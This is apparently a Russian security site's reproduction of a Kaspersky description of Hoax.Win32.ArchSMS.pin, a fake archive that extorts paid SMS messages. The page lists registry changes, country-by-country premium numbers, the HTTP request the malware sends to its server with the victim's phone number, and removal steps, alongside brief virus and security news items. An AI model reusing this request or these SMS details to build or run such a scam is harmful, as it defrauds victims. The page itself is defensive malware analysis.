Hoax.Win32.ArchSMS.pin

Новости Вирусы Уязвимости Статьи Форум Партнеры Контакты

Вирусы

02 августа 2012
Trojan-Downloader.Win32.Small.bsuj

Троянская программа, которая без ведома пользователя загружает из сети Интернет другие вредоносные программы и запускает их на выполнение. Является приложением Windows (PE-EXE файл). Имеет размер 3136 байт. Написана на C++.

подробнее

02 августа 2012
Trojan-Downloader.Win32.Small.bsum

Троянская программа, которая без ведома пользователя загружает из сети Интернет другие вредоносные программы и запускает их на выполнение. Является приложением Windows (PE-EXE файл). Имеет размер 3136 байт. Написана на C++.

подробнее

27 июля 2012
Trojan-Downloader.Win32.Agent.djuz

Троянская программа, которая без ведома пользователя устанавливает в системе другое вредоносное ПО. Является приложением Windows (PE-EXE файл). Имеет размер 10240 байт. Написана на С++.

подробнее

27 июля 2012
Trojan-Downloader.Java.Agent.kf

Троянская программа, загружающая файлы из сети Интернет без ведома пользователя и запускающая их. Является Java-классом (class-файл). Имеет размер 3775 байт.

подробнее

25 июля 2012
Trojan-Downloader.Java.Agent.lc

Троянская программа, которая без ведома пользователя скачивает на компьютер другое программное обеспечение и запускает его на исполнение. Является Java-классом (class-файл). Имеет размер 3458 байт.

подробнее

Партнеры:

к списку всех партнеров

18 мая 2011 | Hoax.Win32.ArchSMS.pin

Технические детали

Вредоносная программа, требующая выкуп за получение содержимого зашифрованного архива, который, по мнению пользователя, содержит необходимый ему файл. Является приложением Windows (PE-EXE файл). Имеет размер 1212425 байт. Написана на C++.

Деструктивная активность

После запуска троянец выполняет следующие действия:

создает ключи системного реестра:

Изменяет стартовую страницу браузера Internet Explorer, устанавливая следующие значения ключей системного реестра:

[HKLM/Software/Microsoft/Internet Explorer/Main]
"Default_Page_URL"="http://www.sm***xi.net"
"Start Page"="http://www.sm***xi.net"

[HKCU/Software/Microsoft/Internet Explorer/Main]
"Default_Page_URL"="http://www.sm***xi.net"
"Start Page"="http://www.sm***xi.net"

В своем рабочем каталоге создает файл:

%WorkDir%/xsendexe.tmp

и записывает в него сроку:

est

Троянец отображает следующее окно:

После подтверждения пункта "Я согласен(на) с правилами", выбора места распаковки, а также нажатия на кнопку "Распаковать" – вредонос имитирует процесс распаковки файлов. На определенном этапе данный процесс останавливается и пользователю предлагается заполнить поля формы, а потом отправить СМС:

Для других стран предлагается отправить СМС с текстом:

43***04

Ниже приведены страна и номер, на который нужно отправить СМС:

Австрия 0930399999
Бельгия 7796
Болгария 1098
Чехия 9090199
Германия 80888
Дания 1945
Эстония 17013
Испания 5339
Финляндия 179479
Франция 83868
Венгрия 90645045
Киргизия 1171
Литва 1645
Латвия 1874
Нидерланды 7117
Норвегия 2322
Польша 7910
Португалия 68305
Швеция 72170

Для Украины, нужно отправить СМС с текстом:

77***01

на номер:

4161

При отправке подтверждающего сообщения троянец осуществляет следующий HTTP запрос:

GET /pass_request/?guid=3de9581b497e3ea0b9c822735a719b00&parid=0&xnum=&xid=&nomer=+7номер телефонаm=zb&fn=&xtime=rnd1&lp=rnd2HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Opera 10
Host: wlnrar-auth4.net
Connection: Keep-Alive

где rnd1 - произвольная числовая последовательность длинною 5 символов; rnd2 - произвольная последовательность цифр и букв латинского алфавита. В ответ сервер возвращает некоторое целое число, например "899".

Рекомендации по удалению

Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:

При помощи Диспетчера задач завершить троянский процесс.

Удалить оригинальный файл троянца (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).

Удалить файл:

%WorkDir%/xsendexe.tmp

Удалить ключи системного реестра:

Восстановить оригинальные значения ключей системного реестра:

[HKLM/Software/Microsoft/Internet Explorer/Main]
"Default_Page_URL"="http://www.sm***xi.net"
"Start Page"="http://www.sm***xi.net"

[HKCU/Software/Microsoft/Internet Explorer/Main]
"Default_Page_URL"="http://www.sm***xi.net"
"Start Page"="http://www.sm***xi.net"

Произвести полную проверку компьютера Антивирусом Касперского с обновленными антивирусными базами (скачать пробную версию).

Источник: securelist.com.

перейти в архив

Новости

17 сентября 2015 | Trend Micro: Китайские хакеры похитили «терабайты» данных у государственных и технокомпаний.

Хакеры занимались хищением интеллектуальной собственности и стратегически важных документов.

Согласно отчету ИБ-компании Trend Micro, берущая начало еще в 2010 году шпионская кампания, в рамках которой хакеры похищали данные государственных учреждений в Китае, на Филиппинах и Тибете, в 2013 году переключилась на технологические предприятия в США.

подробнее

17 сентября 2015 | F-Secure: Российские хакеры в течение семи лет шпионили за правительственными организациями.

Хакеры использовали вредонос Dukes с целью хищения конфиденциальной информации.

подробнее

11 сентября 2015 | Обнаружено первое вредоносное ПО для Android, изменяющее PIN-код.

Вредонос получает права администратора, деактивировать которые невозможно.

подробнее

11 сентября 2015 | Способный обходить CAPTCHA троян для Android распространяется через Google Play.

Троян обходит CAPTCHA через перенаправление запросов на online-сервис Antigate.com.

подробнее

03 сентября 2015 | Эксперт: Windows показывает неполный список всех доверенных корневых сертификатов.

Windows не предоставляет графический интерфейс для просмотра полного списка.

подробнее

03 сентября 2015 | Миллионы домашних маршрутизаторов подвержены уязвимости Filet-O-Firewall.

Злоумышленники могут полностью скомпрометировать домашние сети миллионов пользователей.

Как следует из бюллетеня безопасности, размещенного на сайте CERT/CC, миллионы домашних маршрутизаторов могут быть подвержены уязвимости Fillet-o-Firewall.

подробнее

24 августа 2015 | «Анонимный интернационал» опубликовал очередную порцию документов Минобороны РФ.

Хакеры опубликовали документы в доказательство некомпетентности сотрудников министерства в области безопасности данных.

Активисты из хакерской группировки «Анонимный интернационал», также известной как «Шалтай-Болтай», опубликовали очередную порцию документов, полученных в результате взлома электронной почты Ксении Большаковой, помощника и секретаря бывшего руководителя Департамента строительства Минобороны РФ Романа Филимонова.

подробнее

24 августа 2015 | Google и Internet Explorer попали в федеральный список экстремистских материалов.

В перечень экстремистских материалов также попали «android_update» и «Kaspersky_antivirus».

Google, кэш «Яндекса» и Internet Explorer попали в федеральный список экстремистских материалов, размещенный на сайте Министерства юстиции России.

подробнее

18 августа 2015 | Неудаляемые супер cookie-файлы продолжают использовать по всему миру

На данный момент только компания AT&T прекратила использование супер cookie-файлов.

По данным нового исследования, проведенного компанией по защите цифровых прав Access, как минимум 9 телекоммуникационных компаний по всему миру используют так называемые супер cookie-файлы для ведения контроля за online-действиями граждан.

подробнее

18 августа 2015 | Windows 10 отправляет данные Microsoft даже в случае отключения определенных функций.

ОС отправляет данные на серверы Microsoft, даже если деактивировать Cortana и поиск в интернете.

Как сообщают эксперты издания ARS Technica, Windows 10 отсылает информацию пользователей на серверы Microsoft даже в случае отключения функций, связанных со сбором и хранением персональных данных.

подробнее

Новости | Вирусы | Уязвимости | Статьи | Партнеры | Форум | Контакты